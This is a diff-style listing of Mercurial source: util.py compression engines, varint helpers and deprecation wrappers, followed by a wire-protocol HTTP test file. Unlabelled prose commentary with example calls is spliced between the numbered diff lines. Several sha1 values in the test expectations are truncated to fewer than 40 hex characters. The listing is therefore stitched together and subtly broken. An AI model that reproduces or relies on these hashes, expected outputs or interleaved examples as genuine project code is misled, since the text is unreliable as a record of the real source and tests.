3877 3918 return compressed
3878 3919 return None
3879 3920
3880 3921 # zlib makes an internal copy of the input buffer, doubling
3881 3922 # memory usage for large inputs. So do streaming compression
3882 3923 # on large inputs.
3883 3924 else:
3884 3925 z = zlib.compressobj()
3885 3926 parts = []
3886 3927 pos = 0
3887 3928 while pos < insize:
3888 3929 pos2 = pos + 2**20
3889 3930 parts.append(z.compress(data[pos:pos2]))
3890 3931 pos = pos2
3891 3932 parts.append(z.flush())
3892 3933
3893 3934 if sum(map(len, parts)) < insize:
3894 3935 return ''.join(parts)
3895 3936 return None
3896 3937
3897 3938 def decompress(self, data):
3898 3939 try:
3899 3940 return zlib.decompress(data)
3900 3941 except zlib.error as e:
3901 3942 raise error.RevlogError(_('revlog decompress error: %s') %
3902 3943 forcebytestr(e))
3903 3944
3904 3945 def revlogcompressor(self, opts=None):
3905 3946 return self.zlibrevlogcompressor()
3906 3947
3907 3948 compengines.register(_zlibengine())
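
To make the ``compressstream``/``decompressorreader`` contract concrete, here is a round trip through the zlib engine just registered (a sketch; ``io.BytesIO`` stands in for any object with a ``read(size)`` method):

    import io
    eng = compengines['zlib']
    blob = b''.join(eng.compressstream(iter([b'hello ', b'world'])))
    reader = eng.decompressorreader(io.BytesIO(blob))
    reader.read(11)  # -> 'hello world'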
3908 3949
3909 3950 class _bz2engine(compressionengine):
3910 3951 def name(self):
3911 3952 return 'bz2'
3912 3953
3913 3954 def bundletype(self):
3914 3955 """An algorithm that produces smaller bundles than ``gzip``.
3915 3956
3916 3957 All Mercurial clients should support this format.
3917 3958
3918 3959 This engine will likely produce smaller bundles than ``gzip`` but
3919 3960 will be significantly slower, both during compression and
3920 3961 decompression.
3921 3962
3922 3963 If available, the ``zstd`` engine can yield similar or better
3923 3964 compression at much higher speeds.
3924 3965 """
3925 3966 return 'bzip2', 'BZ'
3926 3967
3927 3968 # We declare a protocol name but don't advertise by default because
3928 3969 # it is slow.
3929 3970 def wireprotosupport(self):
3930 3971 return compewireprotosupport('bzip2', 0, 0)
3931 3972
3932 3973 def compressstream(self, it, opts=None):
3933 3974 opts = opts or {}
3934 3975 z = bz2.BZ2Compressor(opts.get('level', 9))
3935 3976 for chunk in it:
3936 3977 data = z.compress(chunk)
3937 3978 if data:
3938 3979 yield data
3939 3980
3940 3981 yield z.flush()
3941 3982
3942 3983 def decompressorreader(self, fh):
3943 3984 def gen():
3944 3985 d = bz2.BZ2Decompressor()
3945 3986 for chunk in filechunkiter(fh):
3946 3987 yield d.decompress(chunk)
3947 3988
3948 3989 return chunkbuffer(gen())
3949 3990
3950 3991 compengines.register(_bz2engine())
3951 3992
3952 3993 class _truncatedbz2engine(compressionengine):
3953 3994 def name(self):
3954 3995 return 'bz2truncated'
3955 3996
3956 3997 def bundletype(self):
3957 3998 return None, '_truncatedBZ'
3958 3999
3959 4000 # We don't implement compressstream because it is hackily handled elsewhere.
3960 4001
3961 4002 def decompressorreader(self, fh):
3962 4003 def gen():
3963 4004 # The input stream doesn't have the 'BZ' header. So add it back.
3964 4005 d = bz2.BZ2Decompressor()
3965 4006 d.decompress('BZ')
3966 4007 for chunk in filechunkiter(fh):
3967 4008 yield d.decompress(chunk)
3968 4009
3969 4010 return chunkbuffer(gen())
3970 4011
3971 4012 compengines.register(_truncatedbz2engine())
3972 4013
3973 4014 class _noopengine(compressionengine):
3974 4015 def name(self):
3975 4016 return 'none'
3976 4017
3977 4018 def bundletype(self):
3978 4019 """No compression is performed.
3979 4020
3980 4021 Use this compression engine to explicitly disable compression.
3981 4022 """
3982 4023 return 'none', 'UN'
3983 4024
3984 4025 # Clients always support uncompressed payloads. Servers don't because
3985 4026 # unless you are on a fast network, uncompressed payloads can easily
3986 4027 # saturate your network pipe.
3987 4028 def wireprotosupport(self):
3988 4029 return compewireprotosupport('none', 0, 10)
3989 4030
3990 4031 # We don't implement revlogheader because it is handled specially
3991 4032 # in the revlog class.
3992 4033
3993 4034 def compressstream(self, it, opts=None):
3994 4035 return it
3995 4036
3996 4037 def decompressorreader(self, fh):
3997 4038 return fh
3998 4039
3999 4040 class nooprevlogcompressor(object):
4000 4041 def compress(self, data):
4001 4042 return None
4002 4043
4003 4044 def revlogcompressor(self, opts=None):
4004 4045 return self.nooprevlogcompressor()
4005 4046
4006 4047 compengines.register(_noopengine())
4007 4048
4008 4049 class _zstdengine(compressionengine):
4009 4050 def name(self):
4010 4051 return 'zstd'
4011 4052
4012 4053 @propertycache
4013 4054 def _module(self):
4014 4055 # Not all installs have the zstd module available. So defer importing
4015 4056 # until first access.
4016 4057 try:
4017 4058 from . import zstd
4018 4059 # Force delayed import.
4019 4060 zstd.__version__
4020 4061 return zstd
4021 4062 except ImportError:
4022 4063 return None
4023 4064
4024 4065 def available(self):
4025 4066 return bool(self._module)
4026 4067
4027 4068 def bundletype(self):
4028 4069 """A modern compression algorithm that is fast and highly flexible.
4029 4070
4030 4071 Only supported by Mercurial 4.1 and newer clients.
4031 4072
4032 4073 With the default settings, zstd compression is both faster and yields
4033 4074 better compression than ``gzip``. It also frequently yields better
4034 4075 compression than ``bzip2`` while operating at much higher speeds.
4035 4076
4036 4077 If this engine is available and backwards compatibility is not a
4037 4078 concern, it is likely the best available engine.
4038 4079 """
4039 4080 return 'zstd', 'ZS'
4040 4081
4041 4082 def wireprotosupport(self):
4042 4083 return compewireprotosupport('zstd', 50, 50)
4043 4084
4044 4085 def revlogheader(self):
4045 4086 return '\x28'
4046 4087
4047 4088 def compressstream(self, it, opts=None):
4048 4089 opts = opts or {}
4049 4090 # zstd level 3 is almost always significantly faster than zlib
4050 4091 # while providing no worse compression. It strikes a good balance
4051 4092 # between speed and compression.
4052 4093 level = opts.get('level', 3)
4053 4094
4054 4095 zstd = self._module
4055 4096 z = zstd.ZstdCompressor(level=level).compressobj()
4056 4097 for chunk in it:
4057 4098 data = z.compress(chunk)
4058 4099 if data:
4059 4100 yield data
4060 4101
4061 4102 yield z.flush()
4062 4103
4063 4104 def decompressorreader(self, fh):
4064 4105 zstd = self._module
4065 4106 dctx = zstd.ZstdDecompressor()
4066 4107 return chunkbuffer(dctx.read_from(fh))
4067 4108
4068 4109 class zstdrevlogcompressor(object):
4069 4110 def __init__(self, zstd, level=3):
4070 4111 # Writing the content size adds a few bytes to the output. However,
4071 4112 # it allows decompression to be more optimal since we can
4072 4113 # pre-allocate a buffer to hold the result.
4073 4114 self._cctx = zstd.ZstdCompressor(level=level,
4074 4115 write_content_size=True)
4075 4116 self._dctx = zstd.ZstdDecompressor()
4076 4117 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4077 4118 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4078 4119
4079 4120 def compress(self, data):
4080 4121 insize = len(data)
4081 4122 # Caller handles empty input case.
4082 4123 assert insize > 0
4083 4124
4084 4125 if insize < 50:
4085 4126 return None
4086 4127
4087 4128 elif insize <= 1000000:
4088 4129 compressed = self._cctx.compress(data)
4089 4130 if len(compressed) < insize:
4090 4131 return compressed
4091 4132 return None
4092 4133 else:
4093 4134 z = self._cctx.compressobj()
4094 4135 chunks = []
4095 4136 pos = 0
4096 4137 while pos < insize:
4097 4138 pos2 = pos + self._compinsize
4098 4139 chunk = z.compress(data[pos:pos2])
4099 4140 if chunk:
4100 4141 chunks.append(chunk)
4101 4142 pos = pos2
4102 4143 chunks.append(z.flush())
4103 4144
4104 4145 if sum(map(len, chunks)) < insize:
4105 4146 return ''.join(chunks)
4106 4147 return None
4107 4148
4108 4149 def decompress(self, data):
4109 4150 insize = len(data)
4110 4151
4111 4152 try:
4112 4153 # This was measured to be faster than other streaming
4113 4154 # decompressors.
4114 4155 dobj = self._dctx.decompressobj()
4115 4156 chunks = []
4116 4157 pos = 0
4117 4158 while pos < insize:
4118 4159 pos2 = pos + self._decompinsize
4119 4160 chunk = dobj.decompress(data[pos:pos2])
4120 4161 if chunk:
4121 4162 chunks.append(chunk)
4122 4163 pos = pos2
4123 4164 # Frame should be exhausted, so no finish() API.
4124 4165
4125 4166 return ''.join(chunks)
4126 4167 except Exception as e:
4127 4168 raise error.RevlogError(_('revlog decompress error: %s') %
4128 4169 forcebytestr(e))
4129 4170
4130 4171 def revlogcompressor(self, opts=None):
4131 4172 opts = opts or {}
4132 4173 return self.zstdrevlogcompressor(self._module,
4133 4174 level=opts.get('level', 3))
4134 4175
4135 4176 compengines.register(_zstdengine())
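
With the stock engines registered, the manager can be queried by bundle name, bundle type, or wire-protocol priority; for example (assuming the optional zstd module is available):

    compengines.forbundlename('gzip').name()  # -> 'zlib'
    compengines.forbundletype('BZ').name()    # -> 'bz2'
    [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
    # -> ['zstd', 'zlib', 'bzip2', 'none']  (priority order, ties by name)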
4136 4177
4137 4178 def bundlecompressiontopics():
4138 4179 """Obtains a list of available bundle compressions for use in help."""
4139 4180 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4140 4181 items = {}
4141 4182
4142 4183 # We need to format the docstring. So use a dummy object/type to hold it
4143 4184 # rather than mutating the original.
4144 4185 class docobject(object):
4145 4186 pass
4146 4187
4147 4188 for name in compengines:
4148 4189 engine = compengines[name]
4149 4190
4150 4191 if not engine.available():
4151 4192 continue
4152 4193
4153 4194 bt = engine.bundletype()
4154 4195 if not bt or not bt[0]:
4155 4196 continue
4156 4197
4157 4198 doc = pycompat.sysstr('``%s``\n %s') % (
4158 4199 bt[0], engine.bundletype.__doc__)
4159 4200
4160 4201 value = docobject()
4161 4202 value.__doc__ = doc
4162 4203 value._origdoc = engine.bundletype.__doc__
4163 4204 value._origfunc = engine.bundletype
4164 4205
4165 4206 items[bt[0]] = value
4166 4207
4167 4208 return items
4168 4209
4169 4210 i18nfunctions = bundlecompressiontopics().values()
4170 4211
4171 4212 # convenient shortcut
4172 4213 dst = debugstacktrace
4173 4214
4174 4215 def safename(f, tag, ctx, others=None):
4175 4216 """
4176 4217 Generate a name that it is safe to rename f to in the given context.
4177 4218
4178 4219 f: filename to rename
4179 4220 tag: a string tag that will be included in the new name
4180 4221 ctx: a context, in which the new name must not exist
4181 4222 others: a set of other filenames that the new name must not be in
4182 4223
4183 4224 Returns a file name of the form oldname~tag[~number] which does not exist
4184 4225 in the provided context and is not in the set of other names.
4185 4226 """
4186 4227 if others is None:
4187 4228 others = set()
4188 4229
4189 4230 fn = '%s~%s' % (f, tag)
4190 4231 if fn not in ctx and fn not in others:
4191 4232 return fn
4192 4233 for n in itertools.count(1):
4193 4234 fn = '%s~%s~%s' % (f, tag, n)
4194 4235 if fn not in ctx and fn not in others:
4195 4236 return fn
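
For illustration (names invented; ``ctx`` is any context lacking these files):

    safename('foo', 'merge', ctx)
    # -> 'foo~merge' if unused, else 'foo~merge~1', 'foo~merge~2', ...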
4196 4237
4197 4238 def readexactly(stream, n):
4198 4239 '''read n bytes from stream.read and abort if less was available'''
4199 4240 s = stream.read(n)
4200 4241 if len(s) < n:
4201 4242 raise error.Abort(_("stream ended unexpectedly"
4202 4243 " (got %d bytes, expected %d)")
4203 4244 % (len(s), n))
4204 4245 return s
4205 4246
4206 4247 def uvarintencode(value):
4207 4248 """Encode an unsigned integer value to a varint.
4208 4249
4209 4250 A varint is a variable length integer of 1 or more bytes. Each byte
4210 4251 except the last has the most significant bit set. The lower 7 bits of
4211 4252 each byte store the 2's complement representation, least significant group
4212 4253 first.
4213 4254
4214 4255 >>> uvarintencode(0)
4215 4256 '\\x00'
4216 4257 >>> uvarintencode(1)
4217 4258 '\\x01'
4218 4259 >>> uvarintencode(127)
4219 4260 '\\x7f'
4220 4261 >>> uvarintencode(1337)
4221 4262 '\\xb9\\n'
4222 4263 >>> uvarintencode(65536)
4223 4264 '\\x80\\x80\\x04'
4224 4265 >>> uvarintencode(-1)
4225 4266 Traceback (most recent call last):
4226 4267 ...
4227 4268 ProgrammingError: negative value for uvarint: -1
4228 4269 """
4229 4270 if value < 0:
4230 4271 raise error.ProgrammingError('negative value for uvarint: %d'
4231 4272 % value)
4232 4273 bits = value & 0x7f
4233 4274 value >>= 7
4234 4275 bytes = []
4235 4276 while value:
4236 4277 bytes.append(pycompat.bytechr(0x80 | bits))
4237 4278 bits = value & 0x7f
4238 4279 value >>= 7
4239 4280 bytes.append(pycompat.bytechr(bits))
4240 4281
4241 4282 return ''.join(bytes)
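
Worked example for the 1337 doctest above:

    # 1337 = 0b101_0011_1001
    # low 7 bits: 0b0111001 = 0x39; continuation bit set -> 0xb9, emitted first
    # 1337 >> 7 = 10 = 0x0a; high bit clear -> emitted last
    # result: '\xb9\x0a', shown by the doctest as '\xb9\n'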
4242 4283
4243 4284 def uvarintdecodestream(fh):
4244 4285 """Decode an unsigned variable length integer from a stream.
4245 4286
4246 4287 The passed argument is anything that has a ``.read(N)`` method.
4247 4288
4248 4289 >>> try:
4249 4290 ... from StringIO import StringIO as BytesIO
4250 4291 ... except ImportError:
4251 4292 ... from io import BytesIO
4252 4293 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4253 4294 0
4254 4295 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4255 4296 1
4256 4297 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4257 4298 127
4258 4299 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4259 4300 1337
4260 4301 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4261 4302 65536
4262 4303 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4263 4304 Traceback (most recent call last):
4264 4305 ...
4265 4306 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4266 4307 """
4267 4308 result = 0
4268 4309 shift = 0
4269 4310 while True:
4270 4311 byte = ord(readexactly(fh, 1))
4271 4312 result |= ((byte & 0x7f) << shift)
4272 4313 if not (byte & 0x80):
4273 4314 return result
4274 4315 shift += 7
4275 4316
4276 4317 ###
4277 4318 # Deprecation warnings for util.py splitting
4278 4319 ###
4279 4320
4280 4321 defaultdateformats = dateutil.defaultdateformats
4281 4322
4282 4323 extendeddateformats = dateutil.extendeddateformats
4283 4324
4284 4325 def makedate(*args, **kwargs):
4285 4326 msg = ("'util.makedate' is deprecated, "
4286 4327 "use 'utils.dateutil.makedate'")
4287 4328 nouideprecwarn(msg, "4.6")
4288 4329 return dateutil.makedate(*args, **kwargs)
4289 4330
4290 4331 def datestr(*args, **kwargs):
4291 4332 msg = ("'util.datestr' is deprecated, "
4292 4333 "use 'utils.dateutil.datestr'")
4293 4334 nouideprecwarn(msg, "4.6")
4294 4335 return dateutil.datestr(*args, **kwargs)
4295 4336
4296 4337 def shortdate(*args, **kwargs):
4297 4338 msg = ("'util.shortdate' is deprecated, "
4298 4339 "use 'utils.dateutil.shortdate'")
4299 4340 nouideprecwarn(msg, "4.6")
4300 4341 return dateutil.shortdate(*args, **kwargs)
4301 4342
4302 4343 def parsetimezone(*args, **kwargs):
4303 4344 msg = ("'util.parsetimezone' is deprecated, "
4304 4345 "use 'utils.dateutil.parsetimezone'")
4305 4346 nouideprecwarn(msg, "4.6")
4306 4347 return dateutil.parsetimezone(*args, **kwargs)
4307 4348
4308 4349 def strdate(*args, **kwargs):
4309 4350 msg = ("'util.strdate' is deprecated, "
4310 4351 "use 'utils.dateutil.strdate'")
4311 4352 nouideprecwarn(msg, "4.6")
4312 4353 return dateutil.strdate(*args, **kwargs)
4313 4354
4314 4355 def parsedate(*args, **kwargs):
4315 4356 msg = ("'util.parsedate' is deprecated, "
4316 4357 "use 'utils.dateutil.parsedate'")
4317 4358 nouideprecwarn(msg, "4.6")
4318 4359 return dateutil.parsedate(*args, **kwargs)
4319 4360
4320 4361 def matchdate(*args, **kwargs):
4321 4362 msg = ("'util.matchdate' is deprecated, "
4322 4363 "use 'utils.dateutil.matchdate'")
4323 4364 nouideprecwarn(msg, "4.6")
4324 4365 return dateutil.matchdate(*args, **kwargs)
@@ -1,264 +1,241 b''
1 1 $ cat >> $HGRCPATH << EOF
2 2 > [web]
3 3 > push_ssl = false
4 4 > allow_push = *
5 5 > EOF
6 6
7 7 $ hg init server
8 8 $ cd server
9 9 $ touch a
10 10 $ hg -q commit -A -m initial
11 11 $ cd ..
12 12
13 13 $ hg serve -R server -p $HGPORT -d --pid-file hg.pid
14 14 $ cat hg.pid >> $DAEMON_PIDS
15 15
16 16 compression formats are advertised in compression capability
17 17
18 18 #if zstd
19 19 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=zstd,zlib$' > /dev/null
20 20 #else
21 21 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=zlib$' > /dev/null
22 22 #endif
23 23
24 24 $ killdaemons.py
25 25
26 26 server.compressionengines can replace engines list wholesale
27 27
28 28 $ hg serve --config server.compressionengines=none -R server -p $HGPORT -d --pid-file hg.pid
29 29 $ cat hg.pid > $DAEMON_PIDS
30 30 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=none$' > /dev/null
31 31
32 32 $ killdaemons.py
33 33
34 34 Order of engines can also change
35 35
36 36 $ hg serve --config server.compressionengines=none,zlib -R server -p $HGPORT -d --pid-file hg.pid
37 37 $ cat hg.pid > $DAEMON_PIDS
38 38 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=none,zlib$' > /dev/null
39 39
40 40 $ killdaemons.py
41 41
42 42 Start a default server again
43 43
44 44 $ hg serve -R server -p $HGPORT -d --pid-file hg.pid
45 45 $ cat hg.pid > $DAEMON_PIDS
46 46
47 47 Server should send application/mercurial-0.1 to clients if no Accept is used
48 48
49 49 $ get-with-headers.py --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
50 50 200 Script output follows
51 51 content-type: application/mercurial-0.1
52 52 date: $HTTP_DATE$
53 53 server: testing stub value
54 54 transfer-encoding: chunked
55 55
56 56 Server should send application/mercurial-0.1 when client says it wants it
57 57
58 58 $ get-with-headers.py --hgproto '0.1' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
59 59 200 Script output follows
60 60 content-type: application/mercurial-0.1
61 61 date: $HTTP_DATE$
62 62 server: testing stub value
63 63 transfer-encoding: chunked
64 64
65 65 Server should send application/mercurial-0.2 when client says it wants it
66 66
67 67 $ get-with-headers.py --hgproto '0.2' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
68 68 200 Script output follows
69 69 content-type: application/mercurial-0.2
70 70 date: $HTTP_DATE$
71 71 server: testing stub value
72 72 transfer-encoding: chunked
73 73
74 74 $ get-with-headers.py --hgproto '0.1 0.2' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
75 75 200 Script output follows
76 76 content-type: application/mercurial-0.2
77 77 date: $HTTP_DATE$
78 78 server: testing stub value
79 79 transfer-encoding: chunked
80 80
81 81 Requesting a compression format that the server doesn't support will fall back to 0.1
82 82
83 83 $ get-with-headers.py --hgproto '0.2 comp=aa' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
84 84 200 Script output follows
85 85 content-type: application/mercurial-0.1
86 86 date: $HTTP_DATE$
87 87 server: testing stub value
88 88 transfer-encoding: chunked
89 89
90 90 #if zstd
91 91 zstd is used if available
92 92
93 93 $ get-with-headers.py --hgproto '0.2 comp=zstd' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
94 94 $ f --size --hexdump --bytes 36 --sha1 resp
95 95 resp: size=248, sha1=4d8d8f87fb82bd542ce52881fdc94f850748
96 96 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
97 97 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 7a 73 74 64 |t follows...zstd|
98 98 0020: 28 b5 2f fd |(./.|
99 99
100 100 #endif
101 101
102 102 application/mercurial-0.2 is not yet used on non-streaming responses
103 103
104 104 $ get-with-headers.py --hgproto '0.2' $LOCALIP:$HGPORT '?cmd=heads' -
105 105 200 Script output follows
106 106 content-length: 41
107 107 content-type: application/mercurial-0.1
108 108 date: $HTTP_DATE$
109 109 server: testing stub value
110 110
111 111 e93700bd72895c5addab234c56d4024b487a362f
112 112
113 113 Now test protocol preference usage
114 114
115 115 $ killdaemons.py
116 116 $ hg serve --config server.compressionengines=none,zlib -R server -p $HGPORT -d --pid-file hg.pid
117 117 $ cat hg.pid > $DAEMON_PIDS
118 118
119 119 No Accept will send 0.1+zlib, even though "none" is preferred b/c "none" isn't supported on 0.1
120 120
121 121 $ get-with-headers.py --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' Content-Type
122 122 200 Script output follows
123 123 content-type: application/mercurial-0.1
124 124
125 125 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
126 126 $ f --size --hexdump --bytes 28 --sha1 resp
127 127 resp: size=227, sha1=35a4c074da74f32f5440da3cbf04
128 128 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
129 129 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 78 |t follows..x|
130 130
131 131 Explicit 0.1 will send zlib because "none" isn't supported on 0.1
132 132
133 133 $ get-with-headers.py --hgproto '0.1' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
134 134 $ f --size --hexdump --bytes 28 --sha1 resp
135 135 resp: size=227, sha1=35a4c074da74f32f5440da3cbf04
136 136 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
137 137 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 78 |t follows..x|
138 138
139 139 0.2 with no compression will get "none" because that is server's preference
140 140 (spec says ZL and UN are implicitly supported)
141 141
142 142 $ get-with-headers.py --hgproto '0.2' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
143 143 $ f --size --hexdump --bytes 32 --sha1 resp
144 144 resp: size=432, sha1=ac931b412ec185a02e0e5bcff98dac83
145 145 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
146 146 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 6e 6f 6e 65 |t follows...none|
147 147
148 148 Client receives server preference even if local order doesn't match
149 149
150 150 $ get-with-headers.py --hgproto '0.2 comp=zlib,none' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
151 151 $ f --size --hexdump --bytes 32 --sha1 resp
152 152 resp: size=432, sha1=ac931b412ec185a02e0e5bcff98dac83
153 153 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
154 154 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 6e 6f 6e 65 |t follows...none|
155 155
156 156 Client receives only supported format even if not server preferred format
157 157
158 158 $ get-with-headers.py --hgproto '0.2 comp=zlib' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
159 159 $ f --size --hexdump --bytes 33 --sha1 resp
160 160 resp: size=232, sha1=a1c727f0c9693ca15742a75c30419bc36
161 161 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
162 162 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 7a 6c 69 62 |t follows...zlib|
163 163 0020: 78 |x|
164 164
165 165 $ killdaemons.py
166 166 $ cd ..
167 167
168 168 Test listkeys for listing namespaces
169 169
170 170 $ hg init empty
171 171 $ hg -R empty serve -p $HGPORT -d --pid-file hg.pid
172 172 $ cat hg.pid > $DAEMON_PIDS
173 173
174 174 $ hg --verbose debugwireproto http://$LOCALIP:$HGPORT << EOF
175 175 > command listkeys
176 176 > namespace namespaces
177 177 > EOF
178 s> sendall(*, 0): (glob)
179 178 s> GET /?cmd=capabilities HTTP/1.1\r\n
180 179 s> Accept-Encoding: identity\r\n
181 180 s> accept: application/mercurial-0.1\r\n
182 181 s> host: $LOCALIP:$HGPORT\r\n (glob)
183 182 s> user-agent: mercurial/proto-1.0 (Mercurial *)\r\n (glob)
184 183 s> \r\n
185 184 s> makefile('rb', None)
186 s> readline() -> 36:
187 185 s> HTTP/1.1 200 Script output follows\r\n
188 s> readline() -> 28:
189 186 s> Server: testing stub value\r\n
190 s> readline() -> *: (glob)
191 187 s> Date: $HTTP_DATE$\r\n
192 s> readline() -> 41:
193 188 s> Content-Type: application/mercurial-0.1\r\n
194 s> readline() -> 21:
195 189 s> Content-Length: *\r\n (glob)
196 s> readline() -> 2:
197 190 s> \r\n
198 s> read(*) -> *: lookup branchmap pushkey known getbundle unbundlehash batch changegroupsubset streamreqs=generaldelta,revlogv1 $USUAL_BUNDLE2_CAPS_SERVER$ unbundle=HG10GZ,HG10BZ,HG10UN httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx compression=$BUNDLE2_COMPRESSIONS$ (glob)
191 s> lookup branchmap pushkey known getbundle unbundlehash batch changegroupsubset streamreqs=generaldelta,revlogv1 $USUAL_BUNDLE2_CAPS_SERVER$ unbundle=HG10GZ,HG10BZ,HG10UN httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx compression=$BUNDLE2_COMPRESSIONS$
199 192 sending listkeys command
200 s> sendall(*, 0): (glob)
201 193 s> GET /?cmd=listkeys HTTP/1.1\r\n
202 194 s> Accept-Encoding: identity\r\n
203 195 s> vary: X-HgArg-1,X-HgProto-1\r\n
204 196 s> x-hgarg-1: namespace=namespaces\r\n
205 197 s> x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$\r\n
206 198 s> accept: application/mercurial-0.1\r\n
207 199 s> host: $LOCALIP:$HGPORT\r\n (glob)
208 200 s> user-agent: mercurial/proto-1.0 (Mercurial *)\r\n (glob)
209 201 s> \r\n
210 202 s> makefile('rb', None)
211 s> readline() -> 36:
212 203 s> HTTP/1.1 200 Script output follows\r\n
213 s> readline() -> 28:
214 204 s> Server: testing stub value\r\n
215 s> readline() -> *: (glob)
216 205 s> Date: $HTTP_DATE$\r\n
217 s> readline() -> 41:
218 206 s> Content-Type: application/mercurial-0.1\r\n
219 s> readline() -> 20:
220 207 s> Content-Length: 30\r\n
221 s> readline() -> 2:
222 208 s> \r\n
223 s> read(30) -> 30:
224 209 s> bookmarks \n
225 210 s> namespaces \n
226 211 s> phases
227 212 response: bookmarks \nnamespaces \nphases
228 213
229 214 Same thing, but with "httprequest" command
230 215
231 216 $ hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT << EOF
232 217 > httprequest GET ?cmd=listkeys
233 218 > accept: application/mercurial-0.1
234 219 > user-agent: mercurial/proto-1.0 (Mercurial 42)
235 220 > x-hgarg-1: namespace=namespaces
236 221 > EOF
237 222 using raw connection to peer
238 s> sendall(*, 0): (glob)
239 223 s> GET /?cmd=listkeys HTTP/1.1\r\n
240 224 s> Accept-Encoding: identity\r\n
241 225 s> accept: application/mercurial-0.1\r\n
242 226 s> user-agent: mercurial/proto-1.0 (Mercurial 42)\r\n
243 227 s> x-hgarg-1: namespace=namespaces\r\n
244 228 s> host: $LOCALIP:$HGPORT\r\n (glob)
245 229 s> \r\n
246 230 s> makefile('rb', None)
247 s> readline() -> 36:
248 231 s> HTTP/1.1 200 Script output follows\r\n
249 s> readline() -> 28:
250 232 s> Server: testing stub value\r\n
251 s> readline() -> *: (glob)
252 233 s> Date: $HTTP_DATE$\r\n
253 s> readline() -> 41:
254 234 s> Content-Type: application/mercurial-0.1\r\n
255 s> readline() -> 20:
256 235 s> Content-Length: 30\r\n
257 s> readline() -> 2:
258 236 s> \r\n
259 s> read(30) -> 30:
260 237 s> bookmarks \n
261 238 s> namespaces \n
262 239 s> phases
263 240
264 241 $ killdaemons.py